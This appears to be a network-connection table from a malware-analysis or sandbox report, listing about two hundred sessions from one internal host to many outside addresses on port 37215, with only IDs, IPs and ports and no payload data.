                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23179192.168.2.155161041.27.91.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23180192.168.2.153368241.53.5.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23181192.168.2.154760441.128.114.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23182192.168.2.153528641.213.101.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23183192.168.2.153821241.118.67.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23184192.168.2.153806241.228.103.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23185192.168.2.155937441.202.51.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23186192.168.2.153939241.19.176.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23187192.168.2.155016241.175.61.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23188192.168.2.153723641.47.194.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23189192.168.2.154283841.68.111.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23190192.168.2.155845241.43.152.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23191192.168.2.155922041.202.200.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23192192.168.2.153513441.185.107.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23193192.168.2.155822441.120.205.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23194192.168.2.154895841.162.191.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23195192.168.2.154014641.237.135.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23196192.168.2.154105841.38.157.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23197192.168.2.155224841.45.65.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23198192.168.2.153536841.172.226.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23199192.168.2.154803641.229.104.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23200192.168.2.153456441.250.3.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23201192.168.2.155033641.57.115.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23202192.168.2.153700241.39.154.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23203192.168.2.153296641.139.19.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23204192.168.2.153979841.177.67.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23205192.168.2.154718241.151.254.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23206192.168.2.155841041.56.19.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23207192.168.2.154316441.49.149.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23208192.168.2.155875641.188.115.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23209192.168.2.153330441.125.190.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23210192.168.2.154605241.19.142.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23211192.168.2.153568641.138.8.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23212192.168.2.154314641.108.130.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23213192.168.2.155392641.85.210.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23214192.168.2.153613241.175.175.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23215192.168.2.153969841.164.143.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23216192.168.2.153836641.3.152.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23217192.168.2.154425841.112.7.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23218192.168.2.154613841.62.28.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23219192.168.2.153731441.204.178.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23220192.168.2.155404241.17.239.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23221192.168.2.155673441.92.119.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23222192.168.2.153755441.248.108.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23223192.168.2.155396841.147.207.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23224192.168.2.155425841.137.174.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23225192.168.2.153906841.39.9.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23226192.168.2.155784441.214.164.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23227192.168.2.155196841.159.169.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23228192.168.2.153465241.13.33.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23229192.168.2.153370041.17.128.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23230192.168.2.154458241.146.169.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23231192.168.2.153404041.74.138.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23232192.168.2.154285241.10.107.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23233192.168.2.155144241.201.88.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23234192.168.2.153930241.161.96.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23235192.168.2.156091441.211.1.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23236192.168.2.154963841.200.77.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23237192.168.2.153410241.185.147.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23238192.168.2.154371241.10.165.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23239192.168.2.155745641.100.172.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23240192.168.2.154181241.121.148.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23241192.168.2.155794641.24.237.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23242192.168.2.155970041.182.38.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23243192.168.2.153900841.224.191.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23244192.168.2.154830441.202.63.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23245192.168.2.155999641.203.243.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23246192.168.2.154125841.247.74.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23247192.168.2.153936041.224.143.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23248192.168.2.155283041.163.249.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23249192.168.2.154909041.192.249.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23250192.168.2.154693641.150.135.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23251192.168.2.155954641.22.200.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23252192.168.2.155371441.206.30.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23253192.168.2.153345441.84.52.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23254192.168.2.156035641.164.182.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23255192.168.2.154599641.153.75.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23256192.168.2.153655841.163.120.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23257192.168.2.154583441.208.251.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23258192.168.2.154306641.246.238.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23259192.168.2.154647841.106.127.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23260192.168.2.155544441.114.62.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23261192.168.2.154552641.223.156.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23262192.168.2.154724241.39.85.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23263192.168.2.154873241.90.186.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23264192.168.2.154216841.119.18.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23265192.168.2.154616041.60.56.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23266192.168.2.155541241.165.236.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23267192.168.2.154722641.202.183.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23268192.168.2.155626241.253.112.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23269192.168.2.155359841.67.111.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23270192.168.2.154787641.218.13.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23271192.168.2.155471641.67.51.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23272192.168.2.154863841.65.114.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23273192.168.2.156024641.32.122.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23274192.168.2.155824241.123.89.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23275192.168.2.154082441.130.91.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23276192.168.2.154482041.250.70.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23277192.168.2.153436241.67.130.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23278192.168.2.156047841.200.246.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23279192.168.2.153695041.61.76.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23280192.168.2.154110241.27.127.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23281192.168.2.155885841.94.242.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23282192.168.2.155233441.40.250.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23283192.168.2.155259441.52.166.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23284192.168.2.155216041.172.229.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23285192.168.2.153964641.118.204.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23286192.168.2.154101041.190.236.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23287192.168.2.154821641.137.26.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23288192.168.2.153808841.232.158.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23289192.168.2.153975041.24.87.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23290192.168.2.155844441.228.115.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23291192.168.2.156009241.241.226.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23292192.168.2.1545100156.60.115.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23293192.168.2.1541586156.136.144.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23294192.168.2.1534662156.212.13.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23295192.168.2.1543394156.54.175.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23296192.168.2.1543352156.202.104.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23297192.168.2.1559718156.51.140.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23298192.168.2.1548850156.222.109.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23299192.168.2.1555262156.38.37.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23300192.168.2.1532906156.205.158.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23301192.168.2.1548372156.178.143.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23302192.168.2.1546310156.7.167.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23303192.168.2.1560678156.238.12.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23304192.168.2.1549018156.48.1.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23305192.168.2.1556970156.246.231.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23306192.168.2.1537034156.44.128.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23307192.168.2.1533062156.80.139.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23308192.168.2.1544122156.177.151.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23309192.168.2.1540150156.176.46.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23310192.168.2.1560176156.140.182.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23311192.168.2.1558168156.136.248.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23312192.168.2.1550106156.193.218.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23313192.168.2.1556724156.12.189.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23314192.168.2.1553780156.30.134.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23315192.168.2.1546924156.110.213.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23316192.168.2.1532876156.70.29.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23317192.168.2.1542204156.42.150.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23318192.168.2.1557042156.1.28.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23319192.168.2.1541548156.96.53.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23320192.168.2.1539030156.154.245.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23321192.168.2.1547874156.22.124.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23322192.168.2.1540860156.31.94.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23323192.168.2.1548214156.95.107.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23324192.168.2.1557050156.56.250.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23325192.168.2.1545486156.60.93.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23326192.168.2.1557632156.90.137.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23327192.168.2.1545718156.140.33.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23328192.168.2.1544972156.181.14.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23329192.168.2.1540164156.96.1.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23330192.168.2.1545064156.212.157.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23331192.168.2.1547908156.251.166.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23332192.168.2.1532912156.238.33.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23333192.168.2.1540142156.162.108.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23334192.168.2.1550630156.169.8.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23335192.168.2.1553726156.117.194.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23336192.168.2.1550598156.84.31.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23337192.168.2.1559836156.115.213.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23338192.168.2.1533278156.213.112.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23339192.168.2.1548980156.25.254.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23340192.168.2.1553328156.102.39.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23341192.168.2.1548606156.162.3.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23342192.168.2.1539070156.127.147.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23343192.168.2.1554480156.90.73.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23344192.168.2.1550740156.39.147.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23345192.168.2.1547046156.140.176.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23346192.168.2.1533432156.182.229.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23347192.168.2.1539798156.175.113.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23348192.168.2.1547350156.253.125.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23349192.168.2.1546898156.224.86.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23350192.168.2.1543326156.13.128.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23351192.168.2.1547846156.156.112.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23352192.168.2.1557856156.139.253.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23353192.168.2.1538302156.149.94.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23354192.168.2.1558182156.136.133.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23355192.168.2.1541434156.89.11.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23356192.168.2.1559564156.209.154.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23357192.168.2.1560742156.106.201.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23358192.168.2.1536426156.245.123.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23359192.168.2.1553716156.98.122.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23360192.168.2.1534066156.147.225.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23361192.168.2.1539722156.100.181.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23362192.168.2.1558762156.4.10.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23363192.168.2.1539124156.150.55.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23364192.168.2.1555518156.118.76.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23365192.168.2.1540666156.175.159.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23366192.168.2.1559312156.84.220.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23367192.168.2.1559162156.43.31.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23368192.168.2.1532854156.204.224.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23369192.168.2.1542830156.255.170.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23370192.168.2.1549098156.65.102.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23371192.168.2.1557024156.2.91.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23372192.168.2.1538508156.74.245.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23373192.168.2.1556432156.74.240.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23374192.168.2.1554512156.95.103.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23375192.168.2.1538644156.97.14.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23376192.168.2.1552968156.187.132.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23377192.168.2.1559262156.83.152.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23378192.168.2.1551024156.51.33.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23379192.168.2.1554150156.0.246.18837215
                                                                            TimestampBytes transferredDirectionData


